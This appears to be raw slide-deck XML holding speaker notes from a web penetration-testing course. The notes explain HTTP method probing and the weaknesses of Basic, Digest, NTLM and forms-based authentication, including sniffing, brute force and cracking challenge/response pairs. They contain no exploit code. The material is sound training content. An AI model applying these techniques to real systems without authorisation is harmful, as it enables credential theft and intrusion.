        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40546221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the tools we currently use in web penetration testing do not yet understand or handle the WebSocket communication.  This means that we will fail to intercept or capture this communication path, leaving gaps in our assessment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of the web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>We do have two tools that will handle it currently.  The first is WireShark, which captures the raw network traffic.  We can then try to analyze it.  This is limited due to the fact that much of the WebSocket communication is encrypted.  We can also use OWASP's ZAP interception tool.  Since this basically man in the middle's the traffic, the encryption is not an issue any longer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28886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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275"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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Today we will review web applications from the attacker's perspective, and explore the backdoors and vulnerabilities that they have been leveraging to take control of our web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nothing drives home the risk to organizations like demonstrating an attack first-hand... except perhaps evil people demonstrating the same thing.  This course will show you how, as a penetration tester, you can execute attacks to reveal specific weaknesses in applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You will already be familiar with many of the topics that we cover, but now we are going to show them to you in a new, twisted light.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will cover quite a few topics today.  First, we will have an overview of the web and the attacker's perspective.  Second, we will examine web servers and clients from an attacker's point of view.  Next, we will cover application servers and the HTTP protocol, and then we will outline a web application penetration testing methodology. We will then focus on JavaScript and PHP from the perspective of a penetration tester.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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xfrm>
            <a:off x="685800" y="4579938"/>
            <a:ext cx="5943600" cy="4354512"/>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Knowing what methods are supported by an application helps you plan your attack.  It also will assist in mapping out the architecture of the network. For example, TRACE will show you certain intermediary devices.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You can also determine if method interchange is possible.  Method interchange is when an application accepts its parameters from a GET even though the application was written to use POST.  This can help an attacker both in scripting against an application and when trying to fool users into following specially crafted links.</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xfrm>
            <a:off x="685800" y="4589463"/>
            <a:ext cx="5943600" cy="4354512"/>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altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>Scenario:  In this exercise, you will become acquainted with the various parts of an HTTP request and response as seen by the HTTP server.  Although this may seem trivial, it is important that you fully understand exactly how an HTTP session works and that you thoroughly understand the fundamental parts of the HTTP request / response mechanism.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:ea typeface="SimSun" charset="0"/>
              <a:cs typeface="SimSun" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ea typeface="SimSun" charset="0"/>
                <a:cs typeface="SimSun" charset="0"/>
              </a:rPr>
              <a:t>Objectives: You will examine a generic HTTP request / response session using a network packet sniffing tool, Wireshark.  Because we will be using Wireshark for other exercises, it is important that you become familiar with its user interface and the information that it provides.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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Authentication is covered in this next section.  Obviously, authentication is of great interest to an attacker, as it is the way an application verifies the identity of a user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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Client authentication is how an application verifies the identity of a user.  Most secure application interfaces begin with authentication, so that they can provide the level of access that corresponds to the end-user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s privilege.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are five major authentication schemes.  We are going to explore them in depth over the next few slides.  We will discuss what these authentication methods mean to an attacker.</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Basic authentication was one of the first forms of authentication for the web.  It was defined in RFC 2617 and has a number of problems.  First and foremost, the user name and password are transmitted over the network using a simple Base64 encoding which is trivial to reverse. For the lazy, or smart (you decide), there are many tools and sites that will reverse the encoding with the click of a button.  We will explore some of these over the next few days.</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pPr marL="228600" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The above graphic outlines the HTTP "basic" authentication process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client requests a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The server sends back a 401 status code, which indicates that the client needs to authenticate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The client sends the request again for the page, but this time includes the authentication information input by the user. The username and password are encoded using BASE64 (not encrypted).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600"/>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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One of the reasons that attackers like basic authentication is that it is trivial to decode the username and password, once packets have been captured.   Many of the tools we will use in class have the capabilities to decode this encoded data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If attackers cannot sniff the traffic, then brute-force attacks are facilitated by the fact that the system has no provision for account lockout.  The attacker is able to send an unlimited number of requests.  The only factors that may prevent this are controls outside of the BASIC authentications system such as web app firewalls or log monitoring which would detect the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233476" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4560888"/>
            <a:ext cx="5943600" cy="4319587"/>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Digest mode authentication is an update to Basic mode. It was an effort to solve the problem of unencrypted authentication data being transmitted over the network.  In Digest mode authentication, the server sends a nonce to the client.  This nonce is used as a salt when the client MD5-hashes the password and sends it back with the username.  This makes it harder for the attacker to capture the password.  However, since the nonce is sent in clear text, an attacker can capture the string and crack it using various publicly-available tools.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Digest was originally outlined in RFC 2069.  This was updated in RFC 2617 where features such as the quality of protection flag and the client nonce.  In RFC2617 the response generation was outline as described below.  This system is used when qop is set to auth or left blank.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>First the client generates hash1 (HA1) by doing an md5 hash of "username:realm:password".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Second the client generates hash2 (HA2) by running an md5 hash of "method:URI".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Finally, the client generates the response hash by running an md5 hash of "HA1:nonce:nonceCount:clientNonce:qop:HA2".</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pPr marL="4763" indent="-4763"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The above graphic outlines the HTTP "digest" authentication process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4763" indent="-4763"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Client requests a page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The server sends back a 401 status code, which indicates that the client needs to authenticate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The client sends a request again for the page, but this time includes the authentication information based on input by the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4763" indent="-4763">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4763" indent="-4763"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The big difference between "basic" and "digest" authentication is that with digest authentication, the password is never sent over the wire.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="4763" indent="-4763"/>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For attackers, "digest" authentication is not as desirable as "basic" authentication, because in digest authentication credentials cannot be decoded. However, attackers still like digest authentication because it presents two key vulnerabilities. First, the digest method still does not include a mechanism for account lockout, and second, it is vulnerable to man-in-the-middle attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Why are web applications such a popular target for attackers? First, because of their widespread use. Years ago, use of the Internet was largely confined to academic and research environment. Now thanks to the World Wide Web (WWW), it is integrated into the daily lives of most people and organizations.  One great benefit of web applications is that they are extremely portable and typically function well on a range of client operating systems in default configuration.  They are also easier to create than desktop applications.  (This explains the move toward rich Internet applications.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web applications are often used to store, manage and access sensitive financial and personal information. Consumers use them for accessing bank accounts and managing credit cards; companies use them for sharing intellectual property; hospitals use them for providing patients with access to their medical records. The high value of the data accessed via web applications increases their value as a target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Initially, the web consisted of static, non-interactive pages. Today, web applications are interactive and used for a vast array of purposes, including file sharing and office suites. This has opened the door for many creative exploits, including SQL injection and Cross Site Scripting. </a:t>
            </a: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Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239620" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Integrated Windows Authentication (IWA) is specific to Microsoft Windows operating systems and Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Internet Information Services (IIS).  It leverages authentication which the client operating system has already performed.  When the browser requests a resource, that authentication is passed through to the server which then grants access to the resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This method of authentication is typically seen on intranets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The IWA process is quite simple.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The user authenticates to the client machine by logging on.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The operating system verifies this authentication with the domain controllers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The user browses to a web site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The server requests authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-171450">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The client then passes the original authentication token to the server.</a:t>
            </a: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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240644" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4560888"/>
            <a:ext cx="5791200" cy="4319587"/>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In the LANMAN challenge/response protocol, the server sends a challenge to the client via a 401 response.  The server sets the WWW-Authenticate header to NTLM.  In the subsequent HTTP request, the client sets the response to the NTLM hash.  This is created as outlined before.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The client starts with the LANMAN hash, which is 16 bytes long.  Note that we are talking about the LANMAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> here, which is 16 bytes long, not the original LANMAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, which is up to 14 characters long.  The 16 bytes of the LANMAN hash are padded with fixed padding to make them exactly 21-bytes long.  They are then broken into three seven-character pieces, which we can call LM part 1, LM part 2, and LM part 3.  The third part consists only of the last two bytes of a user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s password hash with some padding.  Each of these three seven-byte pieces is used as a DES key to encrypt the challenge, resulting in Response parts 1, 2, and 3.  The response parts are concatenated together and sent to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The exact same process applies for NTLMv1, but it starts with the 16-byte NT hash instead of the 16-byte LANMAN hash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>With either LANMAN challenge/response or NTLMv1, an attacker could sniff both the challenge and response off of the network and try to crack them, guessing, encrypting, and comparing which passwords would yield the sniffed response from the sniffed challenge.  Note that cracking these challenges is more work than cracking LANMAN hashes stored in the SAM database, because more cryptographic operations are required with the DES algorithm applied to three different piece parts of either the LANMAN or NT hashes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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As with the certificate-based authentication, the attacker focuses on the weak link, which is the client machine.  If the attacker can take control of the client machine or force it to make a request on their behalf, then the attacker can access the web server using the user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s credentials.  This type of authentication is perfect for conducting Cross Site Request Forgery attacks, as we will study later.  </a:t>
            </a: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Forms-based authentication is increasingly common on modern sites.  This occurs when the developer has chosen to use the application to handle authentication instead of relying on the server as the previous methods did.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Forms are very user-friendly as they can be designed to look like the application, instead of using the client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s display widgets.</a:t>
            </a:r>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ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Three pieces make up a forms-based authentication system:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-168275">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Login form – This is the web form that accepts the username and password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-168275">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Processing page – This page processes the authentication attempt.  It may be part of the same page or a separate page entirely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-168275">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
